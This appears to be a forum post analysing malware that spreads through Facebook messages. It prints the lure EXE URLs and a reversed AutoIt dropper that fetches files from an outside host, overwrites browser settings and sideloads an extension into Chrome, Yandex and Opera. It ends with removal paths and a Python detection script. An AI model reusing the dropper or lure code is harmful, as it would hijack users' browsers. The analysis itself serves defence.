Symptoms: the Extensions item in Chrome is blocked (opening the Extensions tab is disabled).
Chrome starts up very slowly (because it also has to run the planted application).
Download the Solution Software here:----> DOWNLOAD LINK
Analysis of the malware infection on Facebook
- Observed behaviour:
1. A private message containing a link is sent to everyone on the victim's Facebook friends list.
2. Clicking the link downloads an EXE file to the computer.
3. Once the file has run, the computer is infected and in turn keeps sending the message.
The links have the following format (note: for reference only, do not click them).
The message is sent with the avatar of the person receiving it.
Code:
var exeler = [
"https://s3-us-west-2.amazonaws.com/yeslanw232323sdsdsd2sds13/video_watching_mp4_facebook_12222333232122233sd290 00421003.exe ",
"Https://s3-us-west-2.amazonaws.com/sadask2323s/video_watching_mp4_facebook_1222233323212233sd2900 0421003.exe",
"Https://s3-us-west-2.amazonaws.com/sadsak2k323s/video_watching_mp4_facebook_122223332322233sd29000 42003.exe",
"https://s3-us-west-2.amazonaws.com/sadsadk21k323s/video_watching_mp4_facebook_1222323222332900042003exe ",
"Https://s3-us-west-2.amazonaws.com/bakbakbak323/video_watching_mp4_facebook_122223332322233sd29000 421003.exe",
"Https://s3-us-west-2.amazonaws.com/sadsad21323ss/video_watching_mp4_facebook_133290004003.exe",
"Https://s3-us-west-2.amazonaws.com/sdskdk213s/video_watching_mp4_facebook_12233290004003.exe",
"Https://s3-us-west-2.amazonaws.com/bakbakwsd21323/video_watching_mp4_facebook_122332900042003.exe",
"Https://s3-us-west-2.amazonaws.com/23sds123s/video_watching_mp4_facebook_12222332900042003.exe"];
// one of the download URLs is picked at random for each message
var exem = exeler[Math.floor(Math.random() * (exeler.length))];
So the file is downloaded to the computer automatically, and once executed it installs itself automatically. So far I have come across at least 2 samples of this kind of infection. This malware is written in AutoIt. Reversing it we get:
Code:
; Single characters are concatenated to hide the strings for the browser process names and "Extensions"
; (the letters are kept exactly as they appear in the posted listing)
Local $chrxxxx2 = "h"
Local $chrxxxx3 = "r"
Local $chrxxxx4 = "o"
Local $chrxxxx5 = "m"
Local $chrxxxx6 = "f"
Local $chrxxxx = $chrxxxx1 & $chrxxxx2 & $chrxxxx3 & $chrxxxx4 & $chrxxxx5 & $chrxxxx6 ; $chrxxxx1 is not present in the listing as posted
Local $browxs1 = "b"
Local $browxs2 = "r"
Local $browxs3 = "o"
Local $browxs4 = "w"
Local $browxs5 = "s"
Local $browxs6 = "f"
Local $browxs7 = "r"
Local $browxs = $browxs1 & $browxs2 & $browxs3 & $browxs4 & $browxs5 & $browxs6 & $browxs7
Local $extsd1 = "E"
Local $extsd2 = "x"
Local $extsd3 = "t"
Local $extsd4 = "f"
Local $extsd5 = "n"
Local $extsd6 = "s"
Local $extsd7 = "i"
Local $extsd8 = "o"
Local $extsd9 = "n"
Local $extsd0 = "s"
Local $extsd = $extsd1 & $extsd2 & $extsd3 & $extsd4 & $extsd5 & $extsd6 & $extsd7 & $extsd8 & $extsd9 & $extsd0
; Close the browsers so their profile folders can be modified
If ProcessExists("" & $chrxxxx & "exe") Then
    ProcessClose("" & $chrxxxx & "exe")
EndIf
If ProcessExists("" & $browxs & "exe") Then
    ProcessClose("" & $browxs & "exe")
EndIf
If ProcessExists("opera.exe") Then
    ProcessClose("opera.exe")
EndIf
Sleep(100)
; Fetch the extension folder name from the server, then create that folder under each browser's Extensions directory
; (@UserProfileDir and @UserName are AutoIt macros; the "@" is missing in the posted listing)
Local $okanid = BinaryToString(InetRead("http://www.patronbayi.com/class.php?idver=true"))
DirCreate(@UserProfileDir & "\AppData\Local\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid)
DirCreate(@UserProfileDir & "\AppData\Local\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid)
DirCreate(@UserProfileDir & "\AppData\Roaming\Opera Software\Opera Stable\" & $extsd & "\" & $okanid)
DirCreate("C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid)
DirCreate("C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid)
DirCreate("C:\Documents and Settings\" & @UserName & "\Application Data\Opera Software\Opera Stable\" & $extsd & "\" & $okanid)
DirCreate(@UserProfileDir & "\file_shared_xs\")
Sleep(100)
; Download the extension files (Preferences, background.js, manifest.json) into the staging folder
InetGet("http://www.patronbayi.com/Preferences", @UserProfileDir & "\file_shared_xs\Preferences", 9)
Sleep(50)
If NOT FileSetAttrib(@UserProfileDir & "\file_shared_xs\Preferences", "+R") Then
EndIf
InetGet("http://www.patronbayi.com/ext/background.js", @UserProfileDir & "\file_shared_xs\background.js", 9)
InetGet("http://www.patronbayi.com/manifest.json", @UserProfileDir & "\file_shared_xs\manifest.json", 9)
; Overwrite each browser's Preferences file and copy the extension into the folder created above
FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", @UserProfileDir & "\AppData\Local\Google\" & $chrxxxx & "\User Data\Default\Preferences", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\background.js", @UserProfileDir & "\AppData\Local\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid & "\background.js", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", @UserProfileDir & "\AppData\Local\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid & "\manifest.json", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", @UserProfileDir & "\AppData\Local\Yandex\YandexBrowser\User Data\Default\Preferences", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\background.js", @UserProfileDir & "\AppData\Local\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid & "\background.js", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", @UserProfileDir & "\AppData\Local\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid & "\manifest.json", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", @UserProfileDir & "\AppData\Roaming\Opera Software\Opera Stable\Preferences", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\background.js", @UserProfileDir & "\AppData\Roaming\Opera Software\Opera Stable\" & $extsd & "\" & $okanid & "\background.js", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", @UserProfileDir & "\AppData\Roaming\Opera Software\Opera Stable\" & $extsd & "\" & $okanid & "\manifest.json", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Google\" & $chrxxxx & "\User Data\Default\Preferences", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\background.js", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid & "\background.js", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid & "\manifest.json", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Yandex\YandexBrowser\User Data\Default\Preferences", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\background.js", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid & "\background.js", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid & "\manifest.json", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", "C:\Documents and Settings\" & @UserName & "\Application Data\Opera Software\Opera Stable\Preferences", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\background.js", "C:\Documents and Settings\" & @UserName & "\Application Data\Opera Software\Opera Stable\" & $extsd & "\" & $okanid & "\background.js", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", "C:\Documents and Settings\" & @UserName & "\Application Data\Opera Software\Opera Stable\" & $extsd & "\" & $okanid & "\manifest.json", 9)
Sleep(100)
; Relaunch the browser so it picks up the planted extension
ShellExecute("" & $chrxxxx & "exe")
The corresponding HTTP requests observed while it runs:
Code:
GET /class.php?idver=true HTTP/1.1
GET /Preferences HTTP/1.1
GET /ext/background.js HTTP/1.1
GET /ext/background.js HTTP/1.1
GET /manifest.json HTTP/1.1
The executable is stored in many different places, but the two storage locations I found are:
Code:
%AppData%\sysreg.exe
C:\User\[username]\Program Data\sysreg.exe
C:\f_install.exe
Search for and remove these EXE files, then search for the following folders:
Code:
C:\Documents and Settings\User\Local Settings\Application Data\Yandex\YandexBrowser\User Data\Default
C:\Documents and Settings\User\Local Settings\Application Data\Yandex\YandexBrowser\User Data
C:\Documents and Settings\User\Local Settings\Application Data\Yandex\YandexBrowser
C:\Documents and Settings\User\Local Settings\Application Data\Yandex
C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions
C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\User Data\Default
C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\User Data
C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome
C:\Documents and Settings\User\Local Settings\Application Data\Google
C:\Documents and Settings\User\file_shared_xs
C:\Documents and Settings\User\Application Data\Opera Software\Opera Stable\Extensions
C:\Documents and Settings\User\Application Data\Opera Software\Opera Stable
C:\Documents and Settings\User\Application Data\Opera Software
C:\Documents and Settings\User\AppData\Roaming\Opera Software\Opera Stable\Extensions
C:\Documents and Settings\User\AppData\Roaming\Opera Software\Opera Stable
C:\Documents and Settings\User\AppData\Roaming\Opera Software
C:\Documents and Settings\User\AppData\Roaming
C:\Documents and Settings\User\AppData\Local\Yandex\YandexBrowser\User Data\Default\Extensions
C:\Documents and Settings\User\AppData\Local\Yandex\YandexBrowser\User Data\Default
C:\Documents and Settings\User\AppData\Local\Yandex\YandexBrowser\User Data
C:\Documents and Settings\User\AppData\Local\Yandex\YandexBrowser
C:\Documents and Settings\User\AppData\Local\Yandex
C:\Documents and Settings\User\AppData\Local\Google\Chrome\User Data\Default\Extensions
C:\Documents and Settings\User\AppData\Local\Google\Chrome\User Data\Default
C:\Documents and Settings\User\AppData\Local\Google\Chrome\User Data
C:\Documents and Settings\User\AppData\Local\Google\Chrome
C:\Documents and Settings\User\AppData\Local\Google
C:\Documents and Settings\User\AppData\Local
C:\Documents and Settings\User\AppData
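As an added example (not code from the post, and not the malware author's code), here is a Python triage script that checks for the traces described above: the lure URL shape from the JavaScript, the file_shared_xs staging folder, the dropped EXE names and the extension folders the AutoIt dropper writes into. The sample directory tree, the extension id `okanid-sample`, the bucket name and the log lines are constructed for the demo; the rule that Chrome Web Store extension ids are 32 characters from a-p, and that Chrome keeps a store-installed extension's manifest under a version subfolder, is Chrome's own layout.

```python
"""Added triage example: scan a user profile for the dropper's traces and
match the lure URLs in web logs. Indicator names come from the post; the
directory tree and log lines are constructed for the demo."""
import os
import re
import tempfile

# Chrome Web Store extension ids are 32 characters drawn from a-p.
EXT_ID_RE = re.compile(r"^[a-p]{32}$")

# Lure URL shape from the post: S3 bucket + video_watching_mp4_facebook_<id>.exe
LURE_URL_RE = re.compile(
    r'https?://s3-us-west-2\.amazonaws\.com/[^/\s"]+/video_watching_mp4_facebook_[0-9a-z]+\.exe',
    re.IGNORECASE,
)

STAGING_DIR = "file_shared_xs"                  # staging folder used by the dropper
DROPPED_EXES = {"sysreg.exe", "f_install.exe"}  # dropped executables named in the post
EXTENSION_DIRS = [                              # sideload targets from the AutoIt code
    os.path.join("AppData", "Local", "Google", "Chrome", "User Data", "Default", "Extensions"),
    os.path.join("AppData", "Local", "Yandex", "YandexBrowser", "User Data", "Default", "Extensions"),
    os.path.join("AppData", "Roaming", "Opera Software", "Opera Stable", "Extensions"),
]


def find_lure_urls(log_lines):
    """Return every lure URL found in an iterable of proxy/web log lines."""
    hits = []
    for line in log_lines:
        hits.extend(LURE_URL_RE.findall(line))
    return hits


def scan_profile(profile_dir):
    """Return sorted (finding, path relative to the profile) tuples for one user profile."""
    findings = []
    if os.path.isdir(os.path.join(profile_dir, STAGING_DIR)):
        findings.append(("staging-folder", STAGING_DIR))
    for root, _dirs, files in os.walk(profile_dir):
        for name in files:
            if name.lower() in DROPPED_EXES:
                findings.append(("dropped-exe", os.path.relpath(os.path.join(root, name), profile_dir)))
    for rel in EXTENSION_DIRS:
        ext_root = os.path.join(profile_dir, rel)
        if not os.path.isdir(ext_root):
            continue
        for ext_id in os.listdir(ext_root):
            ext_path = os.path.join(ext_root, ext_id)
            if not os.path.isdir(ext_path):
                continue
            # A store-installed extension has a 32-char a-p id and keeps manifest.json
            # under a version subfolder; the dropper writes it straight into <id>\.
            if not EXT_ID_RE.match(ext_id):
                findings.append(("bad-extension-id", os.path.join(rel, ext_id)))
            if os.path.isfile(os.path.join(ext_path, "manifest.json")):
                findings.append(("unpacked-manifest", os.path.join(rel, ext_id)))
    return sorted(findings)


def _touch(path):
    """Create an empty file, making parent folders as needed (demo helper)."""
    os.makedirs(os.path.dirname(path), exist_ok=True)
    open(path, "w").close()


def run_demo():
    """Build a constructed profile tree (one clean extension, one sideloaded) and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        chrome_ext = os.path.join(tmp, EXTENSION_DIRS[0])
        _touch(os.path.join(chrome_ext, "a" * 32, "1.0.0_0", "manifest.json"))  # clean store layout
        _touch(os.path.join(chrome_ext, "okanid-sample", "manifest.json"))        # sideloaded (constructed id)
        _touch(os.path.join(chrome_ext, "okanid-sample", "background.js"))
        _touch(os.path.join(tmp, STAGING_DIR, "Preferences"))
        _touch(os.path.join(tmp, "AppData", "Roaming", "sysreg.exe"))
        return scan_profile(tmp)


# Constructed proxy log lines: one lure download and one ordinary request.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET https://s3-us-west-2.amazonaws.com/examplebucket123/video_watching_mp4_facebook_1222333.exe HTTP/1.1" 200',
    '10.0.0.5 - - "GET https://www.example.com/index.html HTTP/1.1" 200',
]

if __name__ == "__main__":
    for kind, path in run_demo():
        print(kind, path)
    print(find_lure_urls(SAMPLE_LOG))
```

On a real machine, call scan_profile with the user's profile directory (the folder that contains AppData) and feed find_lure_urls the proxy log. The structural check is the useful part: a manifest.json sitting directly under an entry in the Extensions folder, or an entry whose name is not a 32-character a-p id, cannot have come from the Web Store and matches what the AutoIt code plants.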